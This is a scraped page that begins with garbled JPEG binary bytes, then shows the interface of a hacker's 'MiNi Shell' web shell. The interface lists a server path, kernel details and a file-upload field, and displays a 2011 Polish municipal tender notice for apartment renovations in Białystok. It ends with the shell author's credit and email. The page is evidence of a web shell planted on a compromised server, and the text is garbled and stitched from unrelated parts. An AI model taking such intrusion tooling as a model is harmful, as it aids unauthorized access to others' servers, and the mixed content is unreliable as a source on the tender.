JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/33199-N-2011.html

<p class="kh_header"><b>Białystok: wykonanie remontu lokali mieszkalnych przed zasiedleniem 
w budynkach Zarządu Mienia Komunalnego w Białymstoku przy ul. Krakowskiej 1 m.12, Świętojańskiej 28 m.5 , Barszczańskiej 12 m.17 ,Wierzbowej 15 m.50, Przędzalnianej 4B m.35, Barszczańskiej 14 m.22, Barszczańskiej 8 m.8, remont instalacji elektrycznej w budynku przy ul. Lipowej 16 m.95, remont instalacji elektrycznej przy ul. Sobieskiego 26 m.78, wykonanie przebicia w lokalu użytkowym (piwnica) przy ul. Barszczańskiej 5 w Białymstoku</b><br>
<b>Numer ogłoszenia: 33199 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmk.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie remontu lokali mieszkalnych przed zasiedleniem 
w budynkach Zarządu Mienia Komunalnego w Białymstoku przy ul. Krakowskiej 1 m.12, Świętojańskiej 28 m.5 , Barszczańskiej 12 m.17 ,Wierzbowej 15 m.50, Przędzalnianej 4B m.35, Barszczańskiej 14 m.22, Barszczańskiej 8 m.8, remont instalacji elektrycznej w budynku przy ul. Lipowej 16 m.95, remont instalacji elektrycznej przy ul. Sobieskiego 26 m.78, wykonanie przebicia w lokalu użytkowym (piwnica) przy ul. Barszczańskiej 5 w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: wykonanie remontu lokali mieszkalnych przed zasiedleniem w budynkach Zarządu Mienia Komunalnego w Białymstoku przy ul. Krakowskiej 1 m.12, Świętojańskiej 28 m.5 , Barszczańskiej 12 m.17 ,Wierzbowej 15 m.50, Przędzalnianej 4B m.35, Barszczańskiej 14 m.22, Barszczańskiej 8 m.8, remont instalacji elektrycznej w budynku przy ul. Lipowej 16 m.95, remont instalacji elektrycznej przy ul. Sobieskiego 26 m.78, wykonanie przebicia w lokalu użytkowym (piwnica) przy ul. Barszczańskiej 5 w Białymstoku - zgodnie  z dokumentacją projektową (przedmiarami robót) i specyfikacjami technicznymi wykonania 
i odbioru robót budowlanych. Szczegółowy opis przedmiotu zamówienia został podany 
w załączniku nr 1 do SIWZ Opis przedmiotu zamówienia.
2.	Przedmiot zamówienia obejmuje wykonanie robót budowlanych, sanitarnych i elektrycznych.
3.	Przedmiot zamówienia został podzielony na dziesięć zadań (części zamówienia). Zamawiający dopuszcza złożenie oferty częściowej na jedno, kilka wybranych lub całość przedmiotu zamówienia obejmujący zadania od nr 1 do nr 10.
4.	W celu prawidłowego sporządzenia oferty wskazane jest, aby wykonawca dokonał wizji lokalnej oraz uzyskał wszystkie niezbędne informacje  co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić  w trakcie realizacji zamówienia. 
5.	Wymaga się udzielenia:
1)	zadanie nr 1, 3, 6,7,8,9,10: co najmniej 12 miesięcznej gwarancji i rękojmi  na wykonane roboty wraz z materiałami,
2)	zadanie nr 2,4,5: minimum 5 letniej gwarancji i rękojmi na wymienioną stolarkę okienną  oraz co najmniej 12 miesięcznej gwarancji i rękojmi  na pozostałe roboty wraz z materiałami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.33.20.00-3, 45.33.30.00-0, 45.33.11.00-7, 45.31.10.00-0, 45.40.00.00-1, 45.42.11.32-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca dysponuje osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z  dnia 7 lipca 1994 r. Prawo budowlane-dot. zad. nr 10;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w rozdziale VI SIWZ pkt 3 ppkt 2,
2)	oświadczenie o niepodleganiu wykluczeniu  składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie,
4)	dokumenty określone w rozdziale VI SIWZ pkt pkt 2 ppkt 1,2 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ,
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wynagrodzenie ryczałtowe można zmienić, jeśli w trakcie realizacji umowy zajdą potrzeby zmian, m.in. ilości lub jakości zamówionych robót w stosunku do ustaleń, zawartych w umowie.
Zamawiający dopuszcza możliwość wprowadzenia robót zamiennych w razie wystąpienia okoliczności, których nie można było przewidzieć w dniu zawarcia umowy.
Wprowadzenie robót zamiennych nie może spowodować zwiększenia wysokości wynagrodzenia.
Roboty zamienne mogą zostać wykonane wyłącznie na podstawie uprzednio sporządzonego protokołu konieczności, podpisanego przez Wykonawcę i inspektora/inspektorów nadzoru oraz zatwierdzonego przez Zamawiającego.
Wynagrodzenie wykonawcy za roboty zamienne zostanie ustalone przy jednoczesnym zachowaniu tych samych norm, standardów i parametrów oraz stawek kalkulacyjnych wynagrodzenia określonych w kosztorysach ofertowych - dotyczy stawek robocizny, kosztów ogólnych, kosztów zakupu, cen pracy sprzętu i cen materiałów. Ceny materiałów i sprzętu należy przyjąć wg. cennika wynikającego z kosztorysu ofertowego, a dla materiałów nie wyszczególnionych w cenniku - według faktur dostawców, ale nie wyżej niż średnie ceny SEKOCENBUDU (tabela dla regionu podlaskiego) dla okresu, w którym występuje realizacja robót zamiennych.
Podstawą odbioru robót zamiennych będzie obmiar robót wraz z wyceną kosztorysową sporządzoną przez Wykonawcę.

Zamawiający dopuszcza możliwość rezygnacji z realizacji części robót.
Podstawą określenia wynagrodzenia za zaniechany zakres robót będzie protokół konieczności uzgodniony przez przedstawicieli stron oraz kosztorys sporządzony przez Wykonawcę, zawierający pozycje dla robót zaniechanych z kosztorysu ofertowego Wykonawcy. 
Strony dopuszczają  możliwość przedłużenia terminu o o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy  następujących przypadkach:
1)	wystąpienia robót dodatkowych, awaryjnych, zamiennych, których wykonanie wiąże się z koniecznością wydłużenia czasu realizacji zamówienia, 
2)	działaniem siły wyższej, tzn. zjawisk mających charakter nagły, gwałtowny, nieprzewidywalny (np. powódź, huragan, śnieżyce),
3)	przerwania lub zawieszenia robót przez Zamawiającego z przyczyn niezawinionych przez Wykonawcę,
4)	w przypadku wystąpienia warunków atmosferycznych nie pozwalających na prowadzenie prac oraz uniemożliwiających zapewnienia odpowiedniej ich jakości (ciągłe opady deszczu, niska temperatura powietrza),
5)	opóźnień spowodowanych niewykonaniem przez Zamawiającego zobowiązań dotyczących m.in. terminów przekazania placu budowy, dokumentów koniecznych do realizacji zamówienia, dokumentacji zamiennej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, pokój 111..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2011 godzina 09:00, miejsce: Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, sekretariat, pokój 201..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku przy ul. Krakowskiej 1 m.12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku przy ul. Krakowskiej 1 m.12 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.33.20.00-3, 45.33.30.00-0, 45.33.11.00-7, 45.31.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku przy ul. Świętojańskiej 28 m.5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku przy ul. Świętojańskiej 28 m.5 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.33.20.00-3, 45.33.30.00-0, 45.33.11.00-7, 45.31.11.00-0, 45.42.11.32-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku  przy ul. Barszczańskiej 12 m.17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku  przy ul. Barszczańskiej 12 m.17 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.33.20.00-3, 45.33.30.00-0, 45.31.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku przy ul. Wierzbowej 15 m.50.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku przy ul. Wierzbowej 15 m.50 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.20.00-3, 45.33.30.00-0, 45.33.11.00-7, 45.31.11.00-0, 45.42.11.32-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku przy ul. Przędzalnianej 4B m.35.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku przy ul. Przędzalnianej 4B m.35 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.33.20.00-3, 45.33.30.00-0, 45.31.11.00-0, 45.42.11.32-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku przy ul. Barszczańskiej 14 m.22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu Mienia Komunalnego w Białymstoku przy ul. Barszczańskiej 14 m.22 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.33.20.00-3, 45.33.30.00-0, 45.33.11.00-7, 45.31.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku ul. Barszczańskiej 8 m.8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu lokalu mieszkalnego przed zasiedleniem w budynku Zarządu 
Mienia Komunalnego w Białymstoku ul. Barszczańskiej 8 m.8 w zakresie branży budowlanej, sanitarnej, elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.33.20.00-3, 45.33.30.00-0, 45.33.11.00-7, 45.31.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonanie remontu instalacji elektrycznej przy ul. Lipowej 16 m.95.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu instalacji elektrycznej przy ul. Lipowej 16 m.95.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> wykonanie remontu instalacji elektrycznej przy ul. Sobieskiego 26 m.78.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie remontu instalacji elektrycznej przy ul. Sobieskiego 26 m.78.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> wykonanie przebicia w lokalu użytkowym (piwnica) przy ul. Barszczańskiej 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie przebicia w lokalu użytkowym (piwnica) przy ul. Barszczańskiej 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com